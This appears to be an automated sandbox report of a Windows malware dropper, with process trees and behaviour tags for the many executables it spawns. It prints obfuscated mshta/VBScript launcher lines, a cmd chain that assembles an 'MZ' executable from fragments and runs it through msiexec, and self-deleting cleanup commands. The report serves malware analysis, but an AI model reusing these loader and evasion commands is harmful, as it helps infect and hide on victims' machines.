Sun038db98f99bf9a.exeExplorer.EXEcolorcpl.exeEokPGLmIU6f_A094eCm4ixtW.exevy6NfB8MFQfwf7dqcTs4d7VI.exe3e9n_iZAxCcrAw489a4i_YhF.execmd.exedsx8NSUe9OeszftG2KwTJZCm.exedescription pid process target process PID 3608 wrote to memory of 1072 3608 Sun038db98f99bf9a.exe HkYPWI9aKQ83BkX1tmb4PkBH.exe PID 3608 wrote to memory of 1072 3608 Sun038db98f99bf9a.exe HkYPWI9aKQ83BkX1tmb4PkBH.exe PID 3608 wrote to memory of 584 3608 Sun038db98f99bf9a.exe EokPGLmIU6f_A094eCm4ixtW.exe PID 3608 wrote to memory of 584 3608 Sun038db98f99bf9a.exe EokPGLmIU6f_A094eCm4ixtW.exe PID 3608 wrote to memory of 584 3608 Sun038db98f99bf9a.exe EokPGLmIU6f_A094eCm4ixtW.exe PID 3608 wrote to memory of 3864 3608 Sun038db98f99bf9a.exe peVZ_JD1pJ9rKZUC5V1uN9_H.exe PID 3608 wrote to memory of 3864 3608 Sun038db98f99bf9a.exe peVZ_JD1pJ9rKZUC5V1uN9_H.exe PID 3608 wrote to memory of 3864 3608 Sun038db98f99bf9a.exe peVZ_JD1pJ9rKZUC5V1uN9_H.exe PID 3608 wrote to memory of 3960 3608 Sun038db98f99bf9a.exe 3e9n_iZAxCcrAw489a4i_YhF.exe PID 3608 wrote to memory of 3960 3608 Sun038db98f99bf9a.exe 3e9n_iZAxCcrAw489a4i_YhF.exe PID 3608 wrote to memory of 3960 3608 Sun038db98f99bf9a.exe 3e9n_iZAxCcrAw489a4i_YhF.exe PID 3608 wrote to memory of 2528 3608 Sun038db98f99bf9a.exe hFBgXG1kL15D1QH2z3IQpdj5.exe PID 3608 wrote to memory of 2528 3608 Sun038db98f99bf9a.exe hFBgXG1kL15D1QH2z3IQpdj5.exe PID 3608 wrote to memory of 2528 3608 Sun038db98f99bf9a.exe hFBgXG1kL15D1QH2z3IQpdj5.exe PID 3608 wrote to memory of 2456 3608 Sun038db98f99bf9a.exe inU854R6rROYiSJmh8xYxToM.exe PID 3608 wrote to memory of 2456 3608 Sun038db98f99bf9a.exe inU854R6rROYiSJmh8xYxToM.exe PID 3608 wrote to memory of 2456 3608 Sun038db98f99bf9a.exe inU854R6rROYiSJmh8xYxToM.exe PID 3608 wrote to memory of 3860 3608 Sun038db98f99bf9a.exe jrRTQ4OfEZSYNWyLy6P_8o7p.exe PID 3608 wrote to memory of 3860 3608 Sun038db98f99bf9a.exe jrRTQ4OfEZSYNWyLy6P_8o7p.exe PID 3608 wrote to memory of 3860 3608 Sun038db98f99bf9a.exe jrRTQ4OfEZSYNWyLy6P_8o7p.exe PID 3008 wrote to memory of 1296 3008 Explorer.EXE colorcpl.exe PID 3008 wrote to memory of 1296 3008 Explorer.EXE colorcpl.exe PID 3008 wrote to memory of 1296 3008 Explorer.EXE colorcpl.exe PID 1296 wrote to memory of 1168 1296 colorcpl.exe cmd.exe PID 1296 wrote to memory of 1168 1296 colorcpl.exe cmd.exe PID 1296 wrote to memory of 1168 1296 colorcpl.exe cmd.exe PID 584 wrote to memory of 1436 584 EokPGLmIU6f_A094eCm4ixtW.exe vy6NfB8MFQfwf7dqcTs4d7VI.exe PID 584 wrote to memory of 1436 584 EokPGLmIU6f_A094eCm4ixtW.exe vy6NfB8MFQfwf7dqcTs4d7VI.exe PID 584 wrote to memory of 1436 584 EokPGLmIU6f_A094eCm4ixtW.exe vy6NfB8MFQfwf7dqcTs4d7VI.exe PID 584 wrote to memory of 1676 584 EokPGLmIU6f_A094eCm4ixtW.exe schtasks.exe PID 584 wrote to memory of 1676 584 EokPGLmIU6f_A094eCm4ixtW.exe schtasks.exe PID 584 wrote to memory of 1676 584 EokPGLmIU6f_A094eCm4ixtW.exe schtasks.exe PID 584 wrote to memory of 3824 584 EokPGLmIU6f_A094eCm4ixtW.exe schtasks.exe PID 584 wrote to memory of 3824 584 EokPGLmIU6f_A094eCm4ixtW.exe schtasks.exe PID 584 wrote to memory of 3824 584 EokPGLmIU6f_A094eCm4ixtW.exe schtasks.exe PID 1436 wrote to memory of 1916 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe 348niyVABJJpEDLnX9LkeUO3.exe PID 1436 wrote to memory of 1916 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe 348niyVABJJpEDLnX9LkeUO3.exe PID 1436 wrote to memory of 3168 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe GsszvROIc777BZI8uRb94auq.exe PID 1436 wrote to memory of 3168 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe GsszvROIc777BZI8uRb94auq.exe PID 1436 wrote to memory of 3168 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe GsszvROIc777BZI8uRb94auq.exe PID 1436 wrote to memory of 436 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe igymXiYoKu13gldo2cV24SID.exe PID 1436 wrote to memory of 436 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe igymXiYoKu13gldo2cV24SID.exe PID 1436 wrote to memory of 436 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe igymXiYoKu13gldo2cV24SID.exe PID 1436 wrote to memory of 684 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe cl49FjCLHtdGJS0qgRY_GIWk.exe PID 1436 wrote to memory of 684 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe cl49FjCLHtdGJS0qgRY_GIWk.exe PID 1436 wrote to memory of 684 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe cl49FjCLHtdGJS0qgRY_GIWk.exe PID 1436 wrote to memory of 380 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe iNlffGo5eLVRM6CPJEHz_UIe.exe PID 1436 wrote to memory of 380 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe iNlffGo5eLVRM6CPJEHz_UIe.exe PID 3960 wrote to memory of 1696 3960 3e9n_iZAxCcrAw489a4i_YhF.exe cmd.exe PID 3960 wrote to memory of 1696 3960 3e9n_iZAxCcrAw489a4i_YhF.exe cmd.exe PID 3960 wrote to memory of 1696 3960 3e9n_iZAxCcrAw489a4i_YhF.exe cmd.exe PID 1436 wrote to memory of 1784 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe dsx8NSUe9OeszftG2KwTJZCm.exe PID 1436 wrote to memory of 1784 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe dsx8NSUe9OeszftG2KwTJZCm.exe PID 1436 wrote to memory of 1784 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe dsx8NSUe9OeszftG2KwTJZCm.exe PID 1696 wrote to memory of 3312 1696 cmd.exe taskkill.exe PID 1696 wrote to memory of 3312 1696 cmd.exe taskkill.exe PID 1696 wrote to memory of 3312 1696 cmd.exe taskkill.exe PID 1784 wrote to memory of 1644 1784 dsx8NSUe9OeszftG2KwTJZCm.exe mshta.exe PID 1784 wrote to memory of 1644 1784 dsx8NSUe9OeszftG2KwTJZCm.exe mshta.exe PID 1784 wrote to memory of 1644 1784 dsx8NSUe9OeszftG2KwTJZCm.exe mshta.exe PID 1436 wrote to memory of 3704 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe Idgt2_xevoseMbjWCCJmG_Xz.exe PID 1436 wrote to memory of 3704 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe Idgt2_xevoseMbjWCCJmG_Xz.exe PID 1436 wrote to memory of 3704 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe Idgt2_xevoseMbjWCCJmG_Xz.exe PID 1436 wrote to memory of 3712 1436 vy6NfB8MFQfwf7dqcTs4d7VI.exe 17t81FuvdBMrcTNzilmgcRH1.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Sun038db98f99bf9a.exe"C:\Users\Admin\AppData\Local\Temp\Sun038db98f99bf9a.exe"2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\HkYPWI9aKQ83BkX1tmb4PkBH.exe"C:\Users\Admin\Pictures\Adobe Films\HkYPWI9aKQ83BkX1tmb4PkBH.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\hFBgXG1kL15D1QH2z3IQpdj5.exe"C:\Users\Admin\Pictures\Adobe Films\hFBgXG1kL15D1QH2z3IQpdj5.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\3e9n_iZAxCcrAw489a4i_YhF.exe"C:\Users\Admin\Pictures\Adobe Films\3e9n_iZAxCcrAw489a4i_YhF.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 3e9n_iZAxCcrAw489a4i_YhF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\3e9n_iZAxCcrAw489a4i_YhF.exe" & del C:\ProgramData\*.dll & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 3e9n_iZAxCcrAw489a4i_YhF.exe /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\peVZ_JD1pJ9rKZUC5V1uN9_H.exe"C:\Users\Admin\Pictures\Adobe Films\peVZ_JD1pJ9rKZUC5V1uN9_H.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\EokPGLmIU6f_A094eCm4ixtW.exe"C:\Users\Admin\Pictures\Adobe Films\EokPGLmIU6f_A094eCm4ixtW.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\vy6NfB8MFQfwf7dqcTs4d7VI.exe"C:\Users\Admin\Documents\vy6NfB8MFQfwf7dqcTs4d7VI.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\348niyVABJJpEDLnX9LkeUO3.exe"C:\Users\Admin\Pictures\Adobe Films\348niyVABJJpEDLnX9LkeUO3.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\GsszvROIc777BZI8uRb94auq.exe"C:\Users\Admin\Pictures\Adobe Films\GsszvROIc777BZI8uRb94auq.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 6606⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 6966⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 7726⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 8086⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 10886⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\iNlffGo5eLVRM6CPJEHz_UIe.exe"C:\Users\Admin\Pictures\Adobe Films\iNlffGo5eLVRM6CPJEHz_UIe.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\cl49FjCLHtdGJS0qgRY_GIWk.exe"C:\Users\Admin\Pictures\Adobe Films\cl49FjCLHtdGJS0qgRY_GIWk.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\igymXiYoKu13gldo2cV24SID.exe"C:\Users\Admin\Pictures\Adobe Films\igymXiYoKu13gldo2cV24SID.exe"5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\dsx8NSUe9OeszftG2KwTJZCm.exe"C:\Users\Admin\Pictures\Adobe Films\dsx8NSUe9OeszftG2KwTJZCm.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\dsx8NSUe9OeszftG2KwTJZCm.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\dsx8NSUe9OeszftG2KwTJZCm.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\dsx8NSUe9OeszftG2KwTJZCm.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\dsx8NSUe9OeszftG2KwTJZCm.exe" ) do taskkill -f -iM "%~NxM"7⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC11⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "dsx8NSUe9OeszftG2KwTJZCm.exe"8⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\Idgt2_xevoseMbjWCCJmG_Xz.exe"C:\Users\Admin\Pictures\Adobe Films\Idgt2_xevoseMbjWCCJmG_Xz.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-0HP6I.tmp\Idgt2_xevoseMbjWCCJmG_Xz.tmp"C:\Users\Admin\AppData\Local\Temp\is-0HP6I.tmp\Idgt2_xevoseMbjWCCJmG_Xz.tmp" /SL5="$60068,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Idgt2_xevoseMbjWCCJmG_Xz.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-85LOH.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-85LOH.tmp\ShareFolder.exe" /S /UID=27097⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\7-Zip\EOALRBGJQO\foldershare.exe"C:\Program Files\7-Zip\EOALRBGJQO\foldershare.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\bf-e92db-61e-78a80-82ed9679e898c\Hedejaefygi.exe"C:\Users\Admin\AppData\Local\Temp\bf-e92db-61e-78a80-82ed9679e898c\Hedejaefygi.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\25-5fae4-9af-dcaad-013b8016cfd5e\Haewebujegi.exe"C:\Users\Admin\AppData\Local\Temp\25-5fae4-9af-dcaad-013b8016cfd5e\Haewebujegi.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgsefknz.0h3\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\pgsefknz.0h3\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\pgsefknz.0h3\GcleanerEU.exe /eufive10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubzesb55.jzu\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ubzesb55.jzu\installer.exeC:\Users\Admin\AppData\Local\Temp\ubzesb55.jzu\installer.exe /qn CAMPAIGN="654"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mgma4dez.x2u\any.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\mgma4dez.x2u\any.exeC:\Users\Admin\AppData\Local\Temp\mgma4dez.x2u\any.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\mgma4dez.x2u\any.exe"C:\Users\Admin\AppData\Local\Temp\mgma4dez.x2u\any.exe" -u11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ypaqv5xd.kxo\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ypaqv5xd.kxo\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ypaqv5xd.kxo\gcleaner.exe /mixfive10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4te2phkm.hoy\autosubplayer.exe /S & exit9⤵
-
C:\Users\Admin\Pictures\Adobe Films\17t81FuvdBMrcTNzilmgcRH1.exe"C:\Users\Admin\Pictures\Adobe Films\17t81FuvdBMrcTNzilmgcRH1.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-HBH2O.tmp\17t81FuvdBMrcTNzilmgcRH1.tmp"C:\Users\Admin\AppData\Local\Temp\is-HBH2O.tmp\17t81FuvdBMrcTNzilmgcRH1.tmp" /SL5="$5007A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\17t81FuvdBMrcTNzilmgcRH1.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-7E20B.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-7E20B.tmp\ShareFolder.exe" /S /UID=27107⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Internet Explorer\WPKGUAPMAT\foldershare.exe"C:\Program Files\Internet Explorer\WPKGUAPMAT\foldershare.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\9d-4067f-594-e62b0-34d592b46c428\Qyjunukyfi.exe"C:\Users\Admin\AppData\Local\Temp\9d-4067f-594-e62b0-34d592b46c428\Qyjunukyfi.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\95-8d5fe-0b2-c569b-61b1b3b65db3b\Vashaezhufeho.exe"C:\Users\Admin\AppData\Local\Temp\95-8d5fe-0b2-c569b-61b1b3b65db3b\Vashaezhufeho.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0bmised5.z0b\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\0bmised5.z0b\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\0bmised5.z0b\GcleanerEU.exe /eufive10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lmrzwore.300\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\lmrzwore.300\installer.exeC:\Users\Admin\AppData\Local\Temp\lmrzwore.300\installer.exe /qn CAMPAIGN="654"10⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\lmrzwore.300\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\lmrzwore.300\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635407756 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ej2vd3d1.325\any.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ej2vd3d1.325\any.exeC:\Users\Admin\AppData\Local\Temp\ej2vd3d1.325\any.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\ej2vd3d1.325\any.exe"C:\Users\Admin\AppData\Local\Temp\ej2vd3d1.325\any.exe" -u11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tugejwv2.puv\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\tugejwv2.puv\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\tugejwv2.puv\gcleaner.exe /mixfive10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cr4q0ux4.ecw\autosubplayer.exe /S & exit9⤵
-
C:\Users\Admin\Pictures\Adobe Films\GzXwQLrWQrUilTPBbe4MHVGz.exe"C:\Users\Admin\Pictures\Adobe Films\GzXwQLrWQrUilTPBbe4MHVGz.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=16⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"7⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffba9f4dec0,0x7ffba9f4ded0,0x7ffba9f4dee08⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1540,15590274192814082104,16908893868948649954,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3032_1882510266" --mojo-platform-channel-handle=1768 /prefetch:88⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1540,15590274192814082104,16908893868948649954,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3032_1882510266" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1580 /prefetch:28⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1540,15590274192814082104,16908893868948649954,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3032_1882510266" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2536 /prefetch:18⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1540,15590274192814082104,16908893868948649954,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3032_1882510266" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2016 /prefetch:18⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1540,15590274192814082104,16908893868948649954,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3032_1882510266" --mojo-platform-channel-handle=2124 /prefetch:88⤵
-
